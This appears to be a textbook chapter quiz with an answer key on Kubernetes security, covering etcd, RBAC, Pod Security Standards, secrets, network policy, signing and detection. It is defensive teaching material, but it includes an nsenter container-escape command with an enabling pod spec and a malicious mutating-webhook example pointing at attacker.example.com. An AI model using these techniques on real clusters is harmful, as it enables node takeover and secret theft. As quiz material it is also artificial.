Chapter 51 Quiz: Kubernetes Security

Test your knowledge of Kubernetes architecture security, Pod Security Standards, RBAC, container escapes, secrets management, network policies, supply chain security, runtime detection, etcd protection, and audit logging.


Questions

1. Which Kubernetes control plane component stores all cluster state and secrets, making it the highest-value target for an attacker who has gained cluster access?

  • A) kube-scheduler
  • B) kube-controller-manager
  • C) etcd — it stores all cluster state including secrets in key-value pairs, and if compromised, gives the attacker access to every secret, configuration, and resource definition in the cluster
  • D) kube-proxy
Answer

C — etcd — it stores all cluster state including secrets in key-value pairs, and if compromised, gives the attacker access to every secret, configuration, and resource definition in the cluster

etcd is the distributed key-value store that serves as the single source of truth for all Kubernetes cluster state. Every secret, ConfigMap, RBAC policy, and resource definition is stored here. An attacker with direct etcd access can read all secrets (bypassing RBAC entirely), modify cluster state, and create backdoor accounts. Protection requires mTLS, network isolation, encryption at rest, and restricted access to the etcd client port (2379).
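The hardening controls above map to concrete etcd flags. A sketch, using kubeadm's default certificate paths (your distribution's paths may differ):

```yaml
# Excerpt from a kubeadm-style static pod manifest (/etc/kubernetes/manifests/etcd.yaml).
command:
- etcd
- --client-cert-auth=true                           # require client certificates (mTLS) on 2379
- --trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
- --cert-file=/etc/kubernetes/pki/etcd/server.crt
- --key-file=/etc/kubernetes/pki/etcd/server.key
- --peer-client-cert-auth=true                      # mTLS between etcd peers as well
- --listen-client-urls=https://127.0.0.1:2379       # no client listener on non-loopback interfaces
```

With --client-cert-auth=true, even an attacker who can reach port 2379 cannot issue etcdctl commands without a certificate signed by the etcd CA.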


2. What are the three Pod Security Standards profiles defined in Kubernetes, and which one should be enforced for production workloads?

  • A) Low, Medium, High — use High for production
  • B) Privileged (unrestricted), Baseline (minimally restrictive to prevent known escalations), Restricted (heavily restricted following hardening best practices) — use Restricted for production workloads
  • C) Default, Enhanced, Maximum — use Maximum for production
  • D) Open, Guarded, Locked — use Locked for production
Answer

B — Privileged (unrestricted), Baseline (minimally restrictive to prevent known escalations), Restricted (heavily restricted following hardening best practices) — use Restricted for production workloads

Pod Security Standards (PSS) replaced the deprecated PodSecurityPolicy (PSP). The Privileged profile is completely unrestricted (useful only for system-level workloads like CNI plugins). The Baseline profile prevents known privilege escalation vectors (hostNetwork, hostPID, privileged containers). The Restricted profile enforces hardening best practices including running as non-root, dropping all capabilities, read-only root filesystem, and seccomp profiles. Enforcement is applied at the namespace level using labels: pod-security.kubernetes.io/enforce: restricted.
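A minimal namespace manifest enforcing the Restricted profile, with warn and audit modes set to the same level so violations surface before they block deploys:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted
```

A common rollout pattern is to set warn and audit to restricted first, fix the violations they surface, and only then raise enforce from baseline to restricted.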


3. An attacker has compromised a pod running with hostPID: true and privileged: true. What container escape technique can they execute, and why do these settings enable it?

  • A) They can only read host logs
  • B) They can use nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash to escape into the host's PID 1 namespace, gaining full root access to the node — hostPID gives visibility into host processes and privileged removes all security boundaries
  • C) They can only access other containers in the same pod
  • D) They can modify Kubernetes RBAC policies remotely
Answer

B — They can use nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash to escape into the host's PID 1 namespace, gaining full root access to the node — hostPID gives visibility into host processes and privileged removes all security boundaries

hostPID: true places the container in the host's PID namespace, making all host processes visible. privileged: true disables seccomp and AppArmor confinement and grants every Linux capability (including CAP_SYS_ADMIN and CAP_SYS_PTRACE). Together, these allow the attacker to use nsenter to enter the host's init process (PID 1) namespaces, effectively escaping the container with full root privileges on the host. From there, they can access the kubelet credentials, pivot to other nodes, and compromise the entire cluster.
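For reference, this is the kind of pod spec that enables the escape — useful as a lab exercise or as a pattern for admission policies to reject (pod name and image are illustrative):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: escape-demo          # lab-only: the Restricted PSS profile rejects this spec
spec:
  hostPID: true              # host process tree visible inside the container
  containers:
  - name: shell
    image: alpine
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true       # disables seccomp/AppArmor, grants all capabilities
# From a shell in this container:
#   nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# drops the attacker into the host's namespaces as root.
```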


4. Why is granting the escalate verb in an RBAC Role considered extremely dangerous, even more so than granting create on Roles?

  • A) The escalate verb is deprecated and has no effect
  • B) The escalate verb allows a subject to create or modify Roles/ClusterRoles with permissions exceeding their own — effectively bypassing the Kubernetes RBAC escalation prevention mechanism and enabling privilege escalation to cluster-admin
  • C) The escalate verb only affects pod scheduling
  • D) The escalate verb is equivalent to get on secrets
Answer

B — The escalate verb allows a subject to create or modify Roles/ClusterRoles with permissions exceeding their own — effectively bypassing the Kubernetes RBAC escalation prevention mechanism and enabling privilege escalation to cluster-admin

Kubernetes normally prevents users from creating Roles with permissions they don't already have. The escalate verb bypasses this protection entirely. A user with escalate on Roles can create a Role with * (wildcard) verbs on * resources, bind it to themselves, and become a cluster-admin. Similarly dangerous are the bind verb (attach any existing Role/ClusterRole to yourself) and impersonate (act as any user/group/service account). Security teams should alert on any RBAC policy containing these three verbs.
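As a concrete detection target, here is the kind of innocuous-looking ClusterRole that actually opens the escalation path (the name is illustrative):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: role-manager         # sounds like routine delegation, but...
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["clusterroles", "clusterrolebindings"]
  # escalate lets the holder create Roles exceeding their own permissions;
  # bind lets them attach any existing ClusterRole to themselves.
  verbs: ["create", "update", "escalate", "bind"]
```

Any Role or ClusterRole containing escalate, bind, or impersonate should be treated as equivalent to granting cluster-admin and alerted on accordingly.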


5. What is the primary risk of using native Kubernetes Secrets without enabling encryption at rest, and how does an attacker exploit this?

  • A) Secrets are automatically encrypted and safe by default
  • B) Kubernetes Secrets are only base64-encoded (not encrypted) and stored in etcd in plaintext — any attacker with direct etcd access or etcdctl can read all secrets without Kubernetes RBAC checks, bypassing the API server entirely
  • C) Secrets are stored in the container filesystem and require pod access
  • D) Secrets are protected by network policies and cannot be read externally
Answer

B — Kubernetes Secrets are only base64-encoded (not encrypted) and stored in etcd in plaintext — any attacker with direct etcd access or etcdctl can read all secrets without Kubernetes RBAC checks, bypassing the API server entirely

Base64 is an encoding scheme, not encryption — echo "cGFzc3dvcmQ=" | base64 -d instantly reveals the secret. Without an EncryptionConfiguration with AES-CBC, AES-GCM, or a KMS provider, all secrets in etcd are readable by anyone with etcd access. This bypasses Kubernetes RBAC because the attacker is reading etcd directly, not going through the API server. Mitigation: enable encryption at rest using EncryptionConfiguration, use a KMS provider (AWS KMS, Azure Key Vault, GCP Cloud KMS) for key management, and migrate sensitive credentials to external secrets managers (HashiCorp Vault, AWS Secrets Manager).
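A minimal EncryptionConfiguration enabling AES-CBC encryption of Secrets at rest, assuming the file is referenced by the API server's --encryption-provider-config flag (the key placeholder must be replaced with a real value):

```yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources: ["secrets"]
  providers:
  - aescbc:
      keys:
      - name: key1
        secret: <base64-encoded 32-byte key>   # e.g. head -c 32 /dev/urandom | base64
  - identity: {}   # fallback so pre-existing plaintext entries remain readable
```

Provider order matters: the first provider encrypts new writes, while later providers are only used to decrypt existing data. After enabling this, existing Secrets must be rewritten (kubectl get secrets --all-namespaces -o json | kubectl replace -f -) to pick up encryption.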


6. A security engineer deploys a NetworkPolicy with policyTypes: ["Ingress", "Egress"] in a namespace running the default Flannel CNI (without network policy support). What happens?

  • A) All traffic to and from pods in the namespace is immediately blocked
  • B) The NetworkPolicy resource is accepted and stored in etcd, but has zero runtime effect — all traffic continues to flow freely because the default Flannel CNI does not implement NetworkPolicy enforcement
  • C) Kubernetes rejects the NetworkPolicy with an error
  • D) The NetworkPolicy is automatically converted to iptables rules
Answer

B — The NetworkPolicy resource is accepted and stored in etcd, but has zero runtime effect — all traffic continues to flow freely because the default Flannel CNI does not implement NetworkPolicy enforcement

This is one of the most dangerous silent failures in Kubernetes. The API server has no awareness of CNI capabilities — it validates the NetworkPolicy schema and stores it in etcd regardless. The security team believes traffic is restricted, but the CNI never programmed any iptables/eBPF rules to enforce it. Verification steps: deploy a test pod and attempt to reach a pod that should be blocked; use tools like cyclonus or netassert for automated testing; confirm the CNI (Calico, Cilium, Antrea) supports and is actively enforcing policies.
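A default-deny policy of the kind described — which the API server will happily store even on a CNI that ignores it, which is exactly why the verification step is mandatory:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}                      # selects every pod in the namespace
  policyTypes: ["Ingress", "Egress"]   # no allow rules => all traffic denied
# Verify enforcement empirically: from a test pod, a connection to any pod in
# this namespace must now fail. If it succeeds, the CNI is not enforcing.
```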


7. How does Cosign image signing with keyless mode (Sigstore) work, and why is it preferred over traditional key-based signing for CI/CD pipelines?

  • A) Keyless mode uses short-lived certificates tied to CI/CD workload identity (e.g., GitHub Actions OIDC token) instead of long-lived signing keys — eliminating the key management burden and the risk of key theft while providing verifiable provenance tied to the specific pipeline run
  • B) Keyless mode does not actually sign images; it only creates a hash
  • C) Keyless mode requires a hardware security module (HSM) for every signing operation
  • D) Keyless mode is less secure because it does not use cryptographic signatures
Answer

A — Keyless mode uses short-lived certificates tied to CI/CD workload identity (e.g., GitHub Actions OIDC token) instead of long-lived signing keys — eliminating the key management burden and the risk of key theft while providing verifiable provenance tied to the specific pipeline run

Sigstore's keyless signing flow: (1) the CI/CD pipeline requests an OIDC identity token from its identity provider (GitHub Actions, GitLab CI); (2) Fulcio (Sigstore's CA) verifies the OIDC token and issues a short-lived X.509 certificate; (3) the image is signed with the ephemeral private key; (4) the signature and certificate are recorded in Rekor (Sigstore's transparency log) for auditability; (5) the private key is discarded. Verification checks the Rekor log entry, the Fulcio certificate chain, and the OIDC identity. This eliminates key rotation, key storage, and key theft risks.
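Verification can then be enforced at admission time. A sketch using Kyverno's verifyImages rule — the policy schema is Kyverno's, but the registry, org, and repository names are hypothetical:

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-signed-images
spec:
  validationFailureAction: Enforce
  rules:
  - name: verify-keyless-signature
    match:
      any:
      - resources:
          kinds: ["Pod"]
    verifyImages:
    - imageReferences: ["ghcr.io/example-org/*"]
      attestors:
      - entries:
        - keyless:
            # The identity of the pipeline that is allowed to sign images
            subject: "https://github.com/example-org/*"
            issuer: "https://token.actions.githubusercontent.com"
```

The check is identity-based: a signature from any other repository or OIDC issuer is rejected, even though it is cryptographically valid.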


8. What KQL query would detect an attacker creating a ClusterRoleBinding to the cluster-admin ClusterRole — a common persistence technique in Kubernetes?

  • A) SecurityEvent | where EventID == 4720
  • B) KubeAuditLogs | where Verb == "create" and ObjectRef_Resource == "clusterrolebindings" | extend RoleRef = parse_json(RequestObject).roleRef | where RoleRef.name == "cluster-admin" — this filters audit logs for ClusterRoleBinding creation events and checks if the bound role is cluster-admin
  • C) SigninLogs | where ResultType == 0
  • D) AzureActivity | where OperationName == "Create Role"
Answer

B — KubeAuditLogs | where Verb == "create" and ObjectRef_Resource == "clusterrolebindings" | extend RoleRef = parse_json(RequestObject).roleRef | where RoleRef.name == "cluster-admin" — this filters audit logs for ClusterRoleBinding creation events and checks if the bound role is cluster-admin

Creating a ClusterRoleBinding to cluster-admin is one of the most critical persistence techniques in Kubernetes (mapped to T1098 Account Manipulation). This query parses the audit log to extract the roleRef from the request object and alerts when it references cluster-admin. The detection should also alert on bindings to any ClusterRole with wildcard permissions (* verbs on * resources), as attackers may create a custom ClusterRole equivalent to cluster-admin to evade detection of the specific name.
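A companion query for the evasion case — creation of a custom ClusterRole with wildcard permissions. It assumes the same KubeAuditLogs schema as the answer above; the TimeGenerated, User_Username, and ObjectRef_Name columns are additional schema assumptions, and the string match on the serialized rules is deliberately loose:

```kusto
KubeAuditLogs
| where Verb == "create" and ObjectRef_Resource == "clusterroles"
| extend Rules = parse_json(RequestObject).rules
| mv-expand Rule = Rules
| where tostring(Rule.verbs) contains "*" and tostring(Rule.resources) contains "*"
| project TimeGenerated, User_Username, ObjectRef_Name, Rule
```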


9. What is the difference between Falco and Tetragon for Kubernetes runtime security, and when would you deploy both?

  • A) They are identical tools from different vendors
  • B) Falco is detect-only (monitors syscalls via eBPF and generates alerts); Tetragon provides both detection and enforcement (can kill processes or override return values at the kernel level before malicious actions complete) — deploy both when you need Tetragon's enforcement on critical paths and Falco's broad detection with SIEM integration
  • C) Falco only works on VMs; Tetragon only works on Kubernetes
  • D) Tetragon replaces Falco in all scenarios
Answer

B — Falco is detect-only (monitors syscalls via eBPF and generates alerts); Tetragon provides both detection and enforcement (can kill processes or override return values at the kernel level before malicious actions complete) — deploy both when you need Tetragon's enforcement on critical paths and Falco's broad detection with SIEM integration

Falco has a mature ecosystem with extensive default rulesets, a large community, and well-tested SIEM integrations. Tetragon (by Cilium/Isovalent) adds enforcement capabilities — it can SIGKILL a process or block a syscall before it completes, providing prevention rather than just detection. In production, Tetragon handles enforcement on critical security paths (container escapes, credential file access), while Falco provides broad visibility and SIEM-integrated alerting across the entire cluster.
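A sketch of a Falco detection rule for an interactive shell inside a container, assuming Falco's default macro set (spawned_process, container) is loaded:

```yaml
- rule: Shell Spawned in Container
  desc: Detect an interactive shell started inside a container
  condition: >
    spawned_process and container
    and proc.name in (bash, sh, zsh)
    and proc.tty != 0
  output: >
    Shell in container (user=%user.name container=%container.name
    image=%container.image.repository command=%proc.cmdline)
  priority: WARNING
  tags: [container, shell, mitre_execution]
```

The equivalent Tetragon TracingPolicy could additionally attach a SIGKILL action, terminating the shell before the attacker's first command completes — the detection-versus-enforcement distinction in practice.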


10. An operator runs kubectl auth can-i --list --as=system:serviceaccount:production:default and discovers the default service account can list secrets cluster-wide. What is the root cause and remediation?

  • A) This is expected behavior and requires no action
  • B) A ClusterRoleBinding or overly permissive ClusterRole is granting the default service account excessive permissions — remediation: delete the binding, create a namespace-scoped Role with only required permissions, disable automounting of the default SA token with automountServiceAccountToken: false, and create dedicated service accounts for each workload
  • C) The kubectl command is showing incorrect results
  • D) Network policies are blocking proper RBAC evaluation
Answer

B — A ClusterRoleBinding or overly permissive ClusterRole is granting the default service account excessive permissions — remediation: delete the binding, create a namespace-scoped Role with only required permissions, disable automounting of the default SA token with automountServiceAccountToken: false, and create dedicated service accounts for each workload

The default service account's token is automatically mounted into every pod that doesn't specify a serviceAccountName. If this SA has cluster-wide secret listing permissions, every pod in the namespace can enumerate all secrets across the cluster. Remediation steps: (1) identify and delete the offending ClusterRoleBinding; (2) set automountServiceAccountToken: false on the default SA; (3) create dedicated SAs for each workload with minimum required permissions; (4) use namespace-scoped Roles instead of ClusterRoles for workload permissions.
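The remediation in manifest form — the workload and namespace names are illustrative:

```yaml
# Neutralize the default SA: no token mounted unless a pod opts in explicitly
apiVersion: v1
kind: ServiceAccount
metadata:
  name: default
  namespace: production
automountServiceAccountToken: false
---
# Dedicated SA per workload
apiVersion: v1
kind: ServiceAccount
metadata:
  name: payments-api
  namespace: production
---
# Namespace-scoped Role with only what the workload needs
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: payments-api
  namespace: production
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get"]
```

The pod spec then sets serviceAccountName: payments-api, and a RoleBinding attaches the Role to that SA.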


11. Why must etcd backups be encrypted, and what attack does an unencrypted backup enable even if etcd encryption at rest is configured?

  • A) Backups don't contain sensitive data
  • B) Even with encryption at rest enabled in Kubernetes, an etcdctl snapshot save backup contains the raw etcd data — if encryption at rest uses the aescbc or aesgcm provider with a locally stored key, the backup contains the encrypted data AND the encryption key is accessible on the control plane node, allowing an attacker who steals the backup to decrypt all secrets offline
  • C) Backups are automatically encrypted by the operating system
  • D) Encryption at rest protects backups automatically
Answer

B — Even with encryption at rest enabled in Kubernetes, an etcdctl snapshot save backup contains the raw etcd data — if encryption at rest uses the aescbc or aesgcm provider with a locally stored key, the backup contains the encrypted data AND the encryption key is accessible on the control plane node, allowing an attacker who steals the backup to decrypt all secrets offline

The encryption key in the EncryptionConfiguration file is stored on the control plane node's filesystem. An attacker who obtains both the etcd backup and access to the control plane node (or a copy of the EncryptionConfiguration) can decrypt every secret. Mitigation: use a KMS provider (the KMS key never leaves the HSM), encrypt backups with a separate key before storing them, store backups in encrypted storage with access controls separate from the cluster, and rotate the etcd encryption key regularly.
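The "encrypt with a separate key" step can be as simple as an openssl pass over the snapshot file. A sketch — in real use snapshot.db comes from etcdctl snapshot save, so a placeholder file stands in here to keep the round-trip runnable anywhere:

```shell
# Placeholder for the real snapshot produced by `etcdctl snapshot save snapshot.db`
[ -f snapshot.db ] || echo "etcd-snapshot-placeholder" > snapshot.db

# Generate a backup key OUTSIDE the cluster; store it separately from the backups
openssl rand -hex 32 > backup.key

# Encrypt the snapshot under that key
openssl enc -aes-256-cbc -pbkdf2 -salt \
  -in snapshot.db -out snapshot.db.enc -pass file:backup.key

# Verify the backup is recoverable before deleting the plaintext copy
openssl enc -d -aes-256-cbc -pbkdf2 \
  -in snapshot.db.enc -out restored.db -pass file:backup.key
cmp -s snapshot.db restored.db && echo "round-trip OK"
rm snapshot.db restored.db
```

An attacker who steals snapshot.db.enc now also needs backup.key, which never touched the control plane node.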


12. What Kubernetes audit policy level should be used for Secret access events, and why is RequestResponse level dangerous for Secrets specifically?

  • A) None — Secrets should never be audited
  • B) Use Metadata level for Secret access — RequestResponse level would log the full request and response bodies, meaning every Secret value would be written to the audit log in cleartext, effectively creating a second copy of all secrets in the log storage system
  • C) RequestResponse is always the safest level for all resources
  • D) Audit logging does not apply to Secrets
Answer

B — Use Metadata level for Secret access — RequestResponse level would log the full request and response bodies, meaning every Secret value would be written to the audit log in cleartext, effectively creating a second copy of all secrets in the log storage system

Kubernetes audit logging supports four levels: None, Metadata, Request, RequestResponse. For Secrets, logging at Request or RequestResponse level writes the base64-encoded secret values into the audit log — and this applies to writes as well as reads, since the request body of a create or update carries the new secret value. Since base64 is trivially reversible, this means every secret is now also stored in your SIEM, log aggregator, or backup system — dramatically expanding the attack surface. The recommended approach: log all Secret operations (reads and writes alike) at Metadata level, which still captures who touched which secret and when, without ever persisting the values.
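A minimal audit Policy fragment implementing this (rules are evaluated in order and the first match wins, so the Secret rule must come before any broader rule):

```yaml
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
# Secrets never above Metadata — request/response bodies carry the values
- level: Metadata
  resources:
  - group: ""
    resources: ["secrets"]
# RBAC changes are high-signal and contain no secret material
- level: RequestResponse
  resources:
  - group: "rbac.authorization.k8s.io"
    resources: ["clusterroles", "clusterrolebindings", "roles", "rolebindings"]
# Catch-all for everything else
- level: Metadata
```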


13. How can a mutating admission webhook be weaponized for persistent cluster compromise, and what is the detection strategy?

  • A) Mutating webhooks can only modify labels and annotations
  • B) An attacker with permissions to create MutatingWebhookConfigurations can register a webhook that silently injects a sidecar container, environment variable, or volume mount into every new pod — the modification is transparent to pod creators and persists as long as the webhook exists. Detect by monitoring audit logs for webhook configuration changes and comparing deployed pod specs against source definitions
  • C) Mutating webhooks are validated by the API server and cannot inject malicious content
  • D) Webhooks only work during cluster upgrades
Answer

B — An attacker with permissions to create MutatingWebhookConfigurations can register a webhook that silently injects a sidecar container, environment variable, or volume mount into every new pod — the modification is transparent to pod creators and persists as long as the webhook exists. Detect by monitoring audit logs for webhook configuration changes and comparing deployed pod specs against source definitions

Mutating admission webhooks intercept API requests before persistence to etcd and can modify the request object arbitrarily. An attacker's webhook could: inject a reverse shell sidecar into every new pod, add environment variables that exfiltrate secrets, mount hostPath volumes for node access, or modify resource limits for crypto-mining. Detection: (1) alert on create/update of mutatingwebhookconfigurations; (2) flag webhooks pointing to external endpoints or non-system namespaces; (3) deploy a canary pod and compare its running spec against its declared spec; (4) restrict webhook configuration permissions to cluster administrators only.
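For illustration, a malicious configuration exhibiting the red flags worth alerting on (names and URL are hypothetical):

```yaml
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: sidecar-injector          # deliberately named to blend in
webhooks:
- name: inject.example.com
  clientConfig:
    url: https://attacker.example.com/mutate   # red flag: external endpoint,
                                               # not an in-cluster service reference
  rules:
  - apiGroups: [""]
    apiVersions: ["v1"]
    operations: ["CREATE"]
    resources: ["pods"]           # red flag: mutates every pod creation
  admissionReviewVersions: ["v1"]
  sideEffects: None
  failurePolicy: Ignore           # red flag: fails silently, so outages never expose it
```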


14. What is the security significance of the --anonymous-auth flag on the Kubernetes API server, and what attack does it enable when combined with permissive RBAC?

  • A) Anonymous auth has no security impact
  • B) When --anonymous-auth=true (the default), unauthenticated requests are assigned the system:anonymous user and system:unauthenticated group — if any ClusterRoleBinding grants permissions to these identities, any unauthenticated attacker on the network can interact with the API server, potentially listing pods, reading ConfigMaps, or even creating workloads
  • C) Anonymous auth only allows read access to public APIs
  • D) Anonymous auth is disabled by default in all Kubernetes distributions
Answer

B — When --anonymous-auth=true (the default), unauthenticated requests are assigned the system:anonymous user and system:unauthenticated group — if any ClusterRoleBinding grants permissions to these identities, any unauthenticated attacker on the network can interact with the API server, potentially listing pods, reading ConfigMaps, or even creating workloads

Anonymous authentication is enabled by default in Kubernetes because some health check endpoints require it. The risk arises when RBAC bindings grant permissions to system:anonymous or system:unauthenticated. A common misconfiguration is binding system:unauthenticated to the cluster-admin role (seen in real-world breaches of misconfigured managed clusters). Audit: run kubectl get clusterrolebindings -o json | jq '.items[] | select(.subjects[]?.name == "system:anonymous" or .subjects[]?.name == "system:unauthenticated")' to find dangerous bindings.


15. A cluster runs Cilium as the CNI with Hubble enabled. During an incident, the SOC needs to trace all network flows from a compromised pod to identify lateral movement. What command provides real-time L3/L4/L7 network visibility, and why is this superior to traditional packet capture?

  • A) tcpdump -i eth0 from the host node
  • B) hubble observe --pod compromised-namespace/compromised-pod --verdict FORWARDED --protocol TCP — Hubble provides identity-aware flow logs showing source/destination pod names, namespaces, labels, and L7 protocol details (HTTP paths, DNS queries, gRPC methods) without the overhead of raw packet capture, and integrates with Cilium's eBPF dataplane for minimal performance impact
  • C) kubectl logs on the compromised pod
  • D) netstat -an inside the container
Answer

B — hubble observe --pod compromised-namespace/compromised-pod --verdict FORWARDED --protocol TCP — Hubble provides identity-aware flow logs showing source/destination pod names, namespaces, labels, and L7 protocol details (HTTP paths, DNS queries, gRPC methods) without the overhead of raw packet capture, and integrates with Cilium's eBPF dataplane for minimal performance impact

Traditional packet capture (tcpdump) provides raw bytes without Kubernetes context — the analyst must manually correlate IP addresses to pod names, namespaces, and workloads. Hubble (Cilium's observability layer) provides Kubernetes-native flow visibility: every flow is annotated with pod name, namespace, labels, service account, and verdict (forwarded/dropped by policy). At L7, Hubble decodes HTTP, DNS, gRPC, and Kafka protocols, showing request paths, response codes, and latency. This dramatically accelerates incident response by eliminating the IP-to-identity correlation step. Hubble flows can be exported to Grafana, Elasticsearch, or a SIEM for historical analysis.


Scoring Guide

Score Assessment
13–15 Excellent — Strong Kubernetes security knowledge, ready for CKS-level challenges
10–12 Good — Solid foundation, review container escape and runtime security sections
7–9 Review Needed — Revisit RBAC, Pod Security Standards, and network policy enforcement
Below 7 Study Required — Re-read Chapter 51 thoroughly, complete Lab 27, and practice with a local cluster

Quiz covers: Architecture security model, Pod Security Standards, RBAC escalation, container escapes, secrets management, network policy enforcement, supply chain security, detection engineering, runtime security, etcd protection, audit logging